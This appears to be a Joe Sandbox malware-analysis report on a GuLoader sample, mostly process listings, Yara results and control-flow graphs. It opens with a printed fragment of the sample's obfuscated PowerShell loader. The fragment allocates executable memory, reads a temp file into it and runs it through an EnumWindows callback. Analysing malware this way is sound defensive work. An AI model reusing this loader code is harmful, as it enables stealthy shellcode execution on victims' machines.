 [ D l l I m p o r t ( " n t d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   N t A l l o c a t e V i r t u a l M e m o r y ( i n t   c h o n d r o g a 6 , r e f   I n t 3 2   C l a t h r a 4 , i n t   V a r e d e k l a , r e f   I n t 3 2   c h o n d r o g a , i n t   O u t h o w l i n g 5 , i n t   c h o n d r o g a 7 ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " R e a d F i l e " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   C D A C ( i n t   V a r e d e k l a 0 , u i n t   V a r e d e k l a 1 , I n t P t r   V a r e d e k l a 2 , r e f   I n t 3 2   V a r e d e k l a 3 , i n t   V a r e d e k l a 4 ) ;  
 [ D l l I m p o r t ( " U S E R 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m W i n d o w s ( I n t P t r   V a r e d e k l a 5 , i n t   V a r e d e k l a 6 ) ;  
  
 }  
 " @  
 # R e m o p 8   D R T R I N E T I N   R e t r e 4   T j e r r i l   U r s k o v s m r   E x i l i c m y s t 6   I l d s p y e n d e   B a k t   M E L I O R A   s r v e r i   A u g u r e r    
 $ c h o n d r o g a 2 = " $ e n v : t e m p "   +   " \ H e t e r o 3 . d a t "  
 # p o s t p   M o n o t o n e r e   S I G N I F   T i d s k r a   L E F T I   R E F O R M P L A N   K l a g 5   R o t a m a n   I n d i v   R o t t e f n g e   T e r r i t o r i 2   X Y L O C O P A P   g o g y d e   M i c r o b e p    
 $ c h o n d r o g a 3 = 0 ;  
 $ c h o n d r o g a 9 = 1 0 4 8 5 7 6 ;  
 $ c h o n d r o g a 8 = [ c h o n d r o g a 1 ] : : N t A l l o c a t e V i r t u a l M e m o r y ( - 1 , [ r e f ] $ c h o n d r o g a 3 , 0 , [ r e f ] $ c h o n d r o g a 9 , 1 2 2 8 8 , 6 4 )  
 # K A R T O   C h i l   e s p r i t i n s t   S H R I L L I N   B O P L S   C r y p t o   U k r l i g s t e 1   M e l o t r a   S U P P R E S I V E   C h e f   R o s e v i n e 5   B i l b r o e n s p   A r b e j 2   I n t e r c a m p   G E V A L T I   R U C H E R S T E N   D I S P R    
 $ c h o n d r o g a 4 = [ c h o n d r o g a 1 ] : : V i a c ( $ c h o n d r o g a 2 , 2 1 4 7 4 8 3 6 4 8 , 1 , 0 , 3 , 1 2 8 , 0 )  
 # d i f f e r e n   h a v e   M o b i l e t s g r 3   a r k f d e r   i n d k   K L O D R I A N E R   T A S K E K R A B B   S J U S S   w h e a t   H y p o p h y s   A f h o l d s h o t 3   T h y r o c o l   U D V U   b u f f   p o l y e t h   b r i s k e t u n t   T Y E T C O Q   C o m p a   A f t a l e p 6   s t i n k i   G E N N E M B O R   a f t e r p   A l i q u a n 1   a n t i m o n y g   F r a n t s   Z I T I   N A G L E T G   B L O T   B e s n a k k e 7   U N D T A   B r a s h l y i g    
 $ c h o n d r o g a 5 = 0 ;  
 # B o l i d e s s l a 5   L A N D S R   P r o s   T l l e s 8   O m k l a s s i f i 7   P e n t a c r o n k 4   H E P T A T   W a k e r   r e g i o   U g e s k r i 7   S l a r 4   F O R E L    
 [ c h o n d r o g a 1 ] : : C D A C ( $ c h o n d r o g a 4 , $ c h o n d r o g a 3 , 5 8 7 6 7 , [ r e f ] $ c h o n d r o g a 5 , 0 )  
 # B E S K   S t r e e t w a r d 7   L e j r u d s t y r 6   U n l a n g u   u n k i n d   H A K M   w r i g h t r y   B a g g a a r d e n 2   S u b c o n t r a 8   f l a v   G r a v s t e d 7   H i g h h a t b a   S h a h    
 [ c h o n d r o g a 1 ] : : E n u m W i n d o w s ( $ c h o n d r o g a 3 ,   0 )  
  
 
      Imagebase:0x970000
      File size:430592 bytes
      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000010.00000002.763535179.0000000009970000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:high

      Target ID:17
      Start time:14:04:49
      Start date:10/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff647620000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:26
      Start time:14:05:20
      Start date:10/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdline
      Imagebase:0xb10000
      File size:2170976 bytes
      MD5 hash:350C52F71BDED7B99668585C15D70EEA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      Target ID:27
      Start time:14:05:24
      Start date:10/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD70A.tmp" "c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP"
      Imagebase:0x970000
      File size:43176 bytes
      MD5 hash:C09985AE74F0882F208D75DE27770DFA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Reset < >

        Execution Graph

        Execution Coverage:3.2%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:0%
        Total number of Nodes:21
        Total number of Limit Nodes:3
        execution_graph 28593 4f26030 28594 4f2602e 28593->28594 28594->28593 28598 4f29888 28594->28598 28603 4f29878 28594->28603 28595 4f2605a 28599 4f298a0 28598->28599 28600 4f298b5 28599->28600 28608 4f276ec 28599->28608 28600->28595 28605 4f2987e 28603->28605 28604 4f298b5 28604->28595 28605->28604 28606 4f276ec GetFileAttributesW 28605->28606 28607 4f298e6 28606->28607 28607->28595 28609 4f29cd0 GetFileAttributesW 28608->28609 28611 4f298e6 28609->28611 28611->28595 28612 4f2de60 28618 4f2c450 28612->28618 28615 4f2de95 28616 4f2df5c CreateFileW 28617 4f2df99 28616->28617 28619 4f2df08 CreateFileW 28618->28619 28621 4f2de7f 28619->28621 28621->28615 28621->28616

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 531 7ef9408-7ef9447 534 7ef944d-7ef948f 531->534 535 7ef9dc5-7ef9e2e 531->535 542 7ef96c8-7ef96fb 534->542 543 7ef9495-7ef9528 534->543 553 7ef9802-7ef9818 542->553 554 7ef9701-7ef9764 542->554 603 7ef952e-7ef9549 543->603 604 7ef96a7-7ef96c6 543->604 559 7ef981a-7ef9820 553->559 560 7ef9826-7ef9855 553->560 597 7ef97ea-7ef97ff 554->597 598 7ef976a-7ef9782 554->598 559->560 562 7ef98d4-7ef9915 call 7ef8750 559->562 575 7ef988d-7ef98d1 call 7ef8750 560->575 576 7ef9857-7ef9872 call 7ef8750 560->576 585 7ef9957-7ef997e 562->585 586 7ef9917-7ef993f 562->586 592 7ef998a-7ef9990 585->592 586->585 609 7ef9941-7ef994c 586->609 594 7ef99a6-7ef99ac 592->594 595 7ef9992-7ef99a0 592->595 599 7ef99ae-7ef99bc 594->599 600 7ef99c2-7ef99ce 594->600 595->594 613 7ef9a82-7ef9a88 595->613 597->553 606 7ef9795-7ef979f 598->606 607 7ef9784-7ef9788 598->607 599->600 599->613 621 7ef9a1a-7ef9a26 600->621 622 7ef99d0-7ef9a02 600->622 611 7ef955f-7ef956c 603->611 612 7ef954b-7ef954f 603->612 604->542 628 7ef97b7-7ef97bd 606->628 629 7ef97a1-7ef97a7 606->629 607->606 614 7ef978a-7ef978d 607->614 623 7ef9955 609->623 632 7ef956e-7ef9574 611->632 633 7ef9584-7ef958a 611->633 612->611 619 7ef9551-7ef9557 612->619 617 7ef9a8e-7ef9af3 613->617 618 7ef9ca3-7ef9ca9 613->618 614->606 674 7ef9c4c-7ef9c6d 617->674 675 7ef9af9-7ef9b0d 617->675 624 7ef9caf-7ef9d06 618->624 625 7ef9da6-7ef9dad 618->625 619->611 621->613 640 7ef9a28-7ef9a5a 621->640 622->621 658 7ef9a04-7ef9a14 622->658 623->592 677 7ef9d5c-7ef9d71 624->677 678 7ef9d08-7ef9d29 624->678 637 7ef97bf-7ef97c3 628->637 638 7ef97ca-7ef97e8 628->638 634 7ef97ab-7ef97ad 629->634 635 7ef97a9 629->635 641 7ef9578-7ef957a 632->641 642 7ef9576 632->642 643 7ef958c-7ef9590 633->643 644 7ef9597-7ef95ae 633->644 634->628 635->628 637->638 645 7ef97c5-7ef97c7 637->645 638->597 638->598 640->613 668 7ef9a5c-7ef9a72 640->668 641->633 642->633 643->644 648 7ef9592-7ef9594 643->648 653 7ef95b4-7ef95f9 644->653 654 7ef9692-7ef96a1 644->654 645->638 648->644 690 7ef95fb-7ef9602 653->690 691 7ef9662-7ef9677 653->691 654->603 654->604 658->621 668->613 674->618 680 7ef9bd3-7ef9bf7 675->680 681 7ef9b13-7ef9b2e 675->681 677->625 687 7ef9d2b-7ef9d31 678->687 688 7ef9d41-7ef9d5a 678->688 698 7ef9bf9-7ef9bff 680->698 699 7ef9c11-7ef9c46 680->699 681->680 689 7ef9b34-7ef9b7a 681->689 693 7ef9d35-7ef9d37 687->693 694 7ef9d33 687->694 688->677 688->678 724 7ef9b7c-7ef9b89 689->724 725 7ef9bbb-7ef9bd0 689->725 695 7ef9615-7ef961f 690->695 696 7ef9604-7ef9608 690->696 691->654 693->688 694->688 706 7ef9637-7ef963d 695->706 707 7ef9621-7ef9627 695->707 696->695 702 7ef960a-7ef960d 696->702 703 7ef9c03-7ef9c0f 698->703 704 7ef9c01 698->704 699->674 699->675 702->695 703->699 704->699 714 7ef963f-7ef9643 706->714 715 7ef964a-7ef9660 706->715 712 7ef962b-7ef962d 707->712 713 7ef9629 707->713 712->706 713->706 714->715 717 7ef9645-7ef9647 714->717 715->690 715->691 717->715 728 7ef9b8b-7ef9b91 724->728 729 7ef9ba1-7ef9bb9 724->729 725->680 730 7ef9b95-7ef9b97 728->730 731 7ef9b93 728->731 729->724 729->725 730->729 731->729
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8851b08a80807ff2337cb037ea6618eb572e1489d5eb51ee9f3caab24fcf6a4c
        • Instruction ID: bc7daa08d78ecaf172d2b305f38d496bd9014882253f84b89de0abed4f16de72
        • Opcode Fuzzy Hash: 8851b08a80807ff2337cb037ea6618eb572e1489d5eb51ee9f3caab24fcf6a4c
        • Instruction Fuzzy Hash: E4527DB4601209CFDB15DF34C850BAE73B2AF85308F1094A9DA4AEB791DB35ED85CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 887 4f2e6b8-4f2e6fd 891 4f2e706-4f2e779 887->891 892 4f2e6ff 887->892 903 4f2e78a-4f2e78e 891->903 904 4f2e77b-4f2e787 891->904 892->891 905 4f2e790-4f2e79d 903->905 906 4f2e79f 903->906 904->903 908 4f2e7a4-4f2e7a6 905->908 906->908 909 4f2e7c0-4f2e829 908->909 910 4f2e7a8-4f2e7ba 908->910 920 4f2e831-4f2e835 909->920 921 4f2e82b-4f2e82f 909->921 910->909 923 4f2e837-4f2e83b 920->923 924 4f2e83d-4f2e841 920->924 921->920 922 4f2e849-4f2e89e 921->922 944 4f2e9c4-4f2e9ec 922->944 923->922 923->924 925 4f2e8a3-4f2e8a7 924->925 926 4f2e843-4f2e847 924->926 928 4f2e8a9-4f2e8da 925->928 929 4f2e8df-4f2e8e3 925->929 926->922 926->925 928->944 930 4f2e8e5-4f2e916 929->930 931 4f2e91b-4f2e91f 929->931 930->944 933 4f2e921-4f2e955 931->933 934 4f2e957-4f2e964 931->934 933->944 942 4f2e966-4f2e96c 934->942 943 4f2e96e 934->943 945 4f2e974-4f2e985 942->945 943->945 956 4f2e9ed 944->956 950 4f2e996 945->950 951 4f2e987-4f2e994 945->951 953 4f2e99b-4f2e9a4 950->953 951->953 955 4f2e9ac-4f2e9c2 953->955 955->944 956->956
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ca3b93da47e03ad2ecbd355062c3e9691debf183c68363801f8a23d64e2ae0a2
        • Instruction ID: 01cf7cd2af95e8ed7d6ad26b66dab7238b1616a3f0e906e8186951107a53d0b9
        • Opcode Fuzzy Hash: ca3b93da47e03ad2ecbd355062c3e9691debf183c68363801f8a23d64e2ae0a2
        • Instruction Fuzzy Hash: F4A19074A00215CFEB19DF35C554BAA7BF2BF88304F248569D5469B3A0DB78ED82CB81
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 436 4f2de60-4f2de93 call 4f2c450 440 4f2de95-4f2debd 436->440 441 4f2debe-4f2df54 436->441 449 4f2df56-4f2df59 441->449 450 4f2df5c-4f2df97 CreateFileW 441->450 449->450 451 4f2dfa0-4f2dfbd 450->451 452 4f2df99-4f2df9f 450->452 452->451
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: d6c989aae954e9aacc57cb5cfe7f6f537c0c122b619b1b894632deb7dff30f98
        • Instruction ID: b712226e9d3c1514f393e878608e7d64b1f4f9ee859f6365784ba8993c1bd98c
        • Opcode Fuzzy Hash: d6c989aae954e9aacc57cb5cfe7f6f537c0c122b619b1b894632deb7dff30f98
        • Instruction Fuzzy Hash: 2D41CC71A042199FDB04DFA9C844BAEFFB5FF48314F04C169EA09AB281C774A945CBE1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 455 4f2c450-4f2df54 458 4f2df56-4f2df59 455->458 459 4f2df5c-4f2df97 CreateFileW 455->459 458->459 460 4f2dfa0-4f2dfbd 459->460 461 4f2df99-4f2df9f 459->461 461->460
        APIs
        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,04F2DE7F,00000000,00000000,00000003,00000000,00000002), ref: 04F2DF8A
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 69c8fbf3f4e6b9cc606933fea039d0bbf30d789bbee87f59ea94f94a45071bac
        • Instruction ID: b45bbaa3cf5bc83255f1fe0fee5d9dcd7fc6a5536bf5b323e8210041cecdb71b
        • Opcode Fuzzy Hash: 69c8fbf3f4e6b9cc606933fea039d0bbf30d789bbee87f59ea94f94a45071bac
        • Instruction Fuzzy Hash: 922134B6D04219AFCB00CF9AD944BDEFBB5FB48310F04811AE919A7650C375A914CFE5
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 464 4f2df00-4f2df54 466 4f2df56-4f2df59 464->466 467 4f2df5c-4f2df97 CreateFileW 464->467 466->467 468 4f2dfa0-4f2dfbd 467->468 469 4f2df99-4f2df9f 467->469 469->468
        APIs
        • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,04F2DE7F,00000000,00000000,00000003,00000000,00000002), ref: 04F2DF8A
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 2522a0f55557f2b75d2bd222c2ab4261492f74c0519936e4418baee089edce73
        • Instruction ID: b75bb0cdb0d2dc872f1ffe999f3de4a4ab7e5ce7948987b0b71ad36ff8223be3
        • Opcode Fuzzy Hash: 2522a0f55557f2b75d2bd222c2ab4261492f74c0519936e4418baee089edce73
        • Instruction Fuzzy Hash: F02123B6D0065A9FCB04CF9AD844ADEFBB4FB48320F04812AE919A7610C375A954CFA5
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 472 4f276ec-4f29d1a 475 4f29d22-4f29d4d GetFileAttributesW 472->475 476 4f29d1c-4f29d1f 472->476 477 4f29d56-4f29d73 475->477 478 4f29d4f-4f29d55 475->478 476->475 478->477
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 04F29D40
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 9f494295efc240ddce92f1891a8e2927efbf58ff8a3ebdfc06db45792a27d0a2
        • Instruction ID: d785fcc979a4cb34978d9a05c7b19d3048be72be65e2c30d614cd738ae6f9b26
        • Opcode Fuzzy Hash: 9f494295efc240ddce92f1891a8e2927efbf58ff8a3ebdfc06db45792a27d0a2
        • Instruction Fuzzy Hash: 322153B1E006299BCB14CF9AC544B9EFBB4FB48320F00811AE819B3600D774A905CFE1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 481 4f29cc8-4f29d1a 483 4f29d22-4f29d4d GetFileAttributesW 481->483 484 4f29d1c-4f29d1f 481->484 485 4f29d56-4f29d73 483->485 486 4f29d4f-4f29d55 483->486 484->483 486->485
        APIs
        • GetFileAttributesW.KERNELBASE(00000000), ref: 04F29D40
        Memory Dump Source
        • Source File: 00000010.00000002.756588346.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_4f20000_powershell.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 027363bb06aa2a2f0907c83b227b07f961f550d9cd510eb9cabe880b0f1577a6
        • Instruction ID: ade03eadf817641185f3c60ba345490bf6d683719d2a02265f079bc85d6687d4
        • Opcode Fuzzy Hash: 027363bb06aa2a2f0907c83b227b07f961f550d9cd510eb9cabe880b0f1577a6
        • Instruction Fuzzy Hash: 5E2133B5D006299BCB14CF9AD544B9EFBB4FB48724F00812AE819B7640C774A905CFA1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 511 7effe78-7effea6 call 7effbd4 515 7effead-7effed1 511->515 519 7efff25-7efff2c 515->519 520 7effed3-7effee7 515->520 520->519 522 7effee9-7efff23 call 7effbe0 520->522 522->519 525 7efff2d-7efff73 522->525
        Strings
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: 0
        • API String ID: 0-4108050209
        • Opcode ID: 36faaa0112048010be08d7b12ca059a2330df05f9c401e4d7d932cb2fac92bdf
        • Instruction ID: 11cae69ed63535a49b484c51d47c08c12b8e94aa014f755765235276e8fe1451
        • Opcode Fuzzy Hash: 36faaa0112048010be08d7b12ca059a2330df05f9c401e4d7d932cb2fac92bdf
        • Instruction Fuzzy Hash: 052135B5A053049FCB00EB74D4546EFBBB6EF89348F004429E604AB340EF399846CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 489 7effe3f-7effea6 call 7effbd4 495 7effead-7effed1 489->495 499 7efff25-7efff2c 495->499 500 7effed3-7effee7 495->500 500->499 502 7effee9-7efff23 call 7effbe0 500->502 502->499 505 7efff2d-7efff73 502->505
        Strings
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID: 0
        • API String ID: 0-4108050209
        • Opcode ID: 12e5513aabf9efe4fee87539019e3a23b528554bb67fd69ace16e5426a489795
        • Instruction ID: 17c5c62720b3baf1942141620e347a0df8a70615e7853c295ffe1cc988c2e035
        • Opcode Fuzzy Hash: 12e5513aabf9efe4fee87539019e3a23b528554bb67fd69ace16e5426a489795
        • Instruction Fuzzy Hash: D92148716093059FC702DB70E864ADF7FB2EF86258F00046AD9009B251DB399849CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 957 7ef7e06-7ef7e18 958 7ef7e1e-7ef7e29 957->958 959 7ef8691-7ef86f4 957->959 960 7ef7e2b-7ef7e3a 958->960 961 7ef7e76 958->961 980 7ef8717-7ef871e 959->980 981 7ef86f6-7ef8710 959->981 962 7ef7e7d-7ef7e86 960->962 963 7ef7e3c-7ef7e61 960->963 961->962 965 7ef7f7d-7ef7fc9 962->965 966 7ef7e8c-7ef7eda 962->966 985 7ef7fcf-7ef8007 965->985 986 7ef806c-7ef8088 965->986 983 7ef7edc-7ef7f0c 966->983 984 7ef7f3a-7ef7f75 966->984 981->980 997 7ef7f0e-7ef7f1d 983->997 998 7ef7f28-7ef7f37 983->998 1010 7ef7f77 call 7ef967a 984->1010 1011 7ef7f77 call 7ef9408 984->1011 1012 7ef7f77 call 7ef93f8 984->1012 1013 7ef7f77 call 7ef9888 984->1013 1014 7ef7f77 call 7ef96c4 984->1014 1000 7ef801b-7ef8066 985->1000 1001 7ef8009-7ef8017 985->1001 991 7ef808a 986->991 992 7ef8096 986->992 991->992 992->959 997->998 1000->985 1000->986 1001->1000 1004 7ef8019 1001->1004 1004->1000 1010->965 1011->965 1012->965 1013->965 1014->965
        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 7ae5a4c4f04d5dae08e6cc2c81d7c05d81bbf89ed920549af51561148c7f983f
        • Instruction ID: b2750f83344ec9f53de8f02f120df48ab11b81d5adaf3be1be950f12e77c9ce2
        • Opcode Fuzzy Hash: 7ae5a4c4f04d5dae08e6cc2c81d7c05d81bbf89ed920549af51561148c7f983f
        • Instruction Fuzzy Hash: 33917D75A01219CFEB14DB64D854B9AB7B2FF88314F1481A9DA09E7290DB349D85CF60
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.761666414.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_8450000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b903a6f43ce00bb2635e9402a44672a25fa33e861378cd51f37e936601697e88
        • Instruction ID: 6a3fb52e4e795ec51ab46b89697d0e9e54ee16b8c694c163fe0209b4f6278d4a
        • Opcode Fuzzy Hash: b903a6f43ce00bb2635e9402a44672a25fa33e861378cd51f37e936601697e88
        • Instruction Fuzzy Hash: E9518D34A00309DFDB19DFA4D855AAEB7B2BF85345F24852EE805AB351DB74EC42CB80
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 88a928a5e6ead3f0cc0f3c069a502f5fac3b0a59728a3ce3ff776a26624dd4e9
        • Instruction ID: 85b7885347f44d4997471399f35916a1ce65c0dafa7dc67754bfc1df48bec952
        • Opcode Fuzzy Hash: 88a928a5e6ead3f0cc0f3c069a502f5fac3b0a59728a3ce3ff776a26624dd4e9
        • Instruction Fuzzy Hash: E0418DB4E01209DBDB14DBB4D440AAEB776EF91304F109978D505AB351DF38A986CF61
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 1643b60d97f464532cbb8ebc06ec38aa1b9d1dbd7eb9d3a04359d599fd4bf1db
        • Instruction ID: 8ebd11fe5da559a5d84d9446809fc7320a47d7eb1d6accc850604ace535ddea6
        • Opcode Fuzzy Hash: 1643b60d97f464532cbb8ebc06ec38aa1b9d1dbd7eb9d3a04359d599fd4bf1db
        • Instruction Fuzzy Hash: 99218078A013099BEB15EBB4D850BAE7773EF81309F105878D6056F780DF38A9468F62
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4b28b961d823cfda9f5b5cca00eb82e4ac76fbc3e27b2666ecd7a73ebb7d49a6
        • Instruction ID: 1e35d9ec3a1076cd619da8c14a11a509aa02ed9e950919c74952fc7b77a1fd3d
        • Opcode Fuzzy Hash: 4b28b961d823cfda9f5b5cca00eb82e4ac76fbc3e27b2666ecd7a73ebb7d49a6
        • Instruction Fuzzy Hash: 87012836A193885FD7275638ACA80D97FB6DFCA211B0640FBC446D7641DA798C0BC792
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.756190219.000000000325D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0325D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_325d000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e4c6edd20dbd3ec0d4e84ef69e6093e0733baf7b40b349efe7bf18767e01827a
        • Instruction ID: 082c1052d0ed70388565d19ceabc63232ec07d52cd2c201c5004093b78509b96
        • Opcode Fuzzy Hash: e4c6edd20dbd3ec0d4e84ef69e6093e0733baf7b40b349efe7bf18767e01827a
        • Instruction Fuzzy Hash: 6601A7724283509BD710CA15DCC4B66FB98EF46374F08C45AFD095B286C3B99A86C6F1
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.756190219.000000000325D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0325D000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_325d000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 375c367a08ca7ad5a0e9a78a46406c11a3946a2ba3940b4dd4ce0b37ffec008d
        • Instruction ID: 6add0fa72f6487b4264b05fe0279df0b6ce6771b6c4e8adccd40edbc79bcb250
        • Opcode Fuzzy Hash: 375c367a08ca7ad5a0e9a78a46406c11a3946a2ba3940b4dd4ce0b37ffec008d
        • Instruction Fuzzy Hash: 0D01526240D3C05FD7168B218C94752BFB8EF53224F0D80DBE9848F297C2795944C7B2
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000010.00000002.761459429.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_7ef0000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 217c61bfdfd8b1408a2595a0b8755e7de29874ad4be5f021103accf4b31fe431
        • Instruction ID: f7de30914f2f88e895289ec87e8cb4de5d812d17ba59e4636861c5f92d077785
        • Opcode Fuzzy Hash: 217c61bfdfd8b1408a2595a0b8755e7de29874ad4be5f021103accf4b31fe431
        • Instruction Fuzzy Hash: 6FF02479A0A2805FC3139774A4608C83F70DF4712971710C3D645CFAB3D5248C458392
        Uniqueness

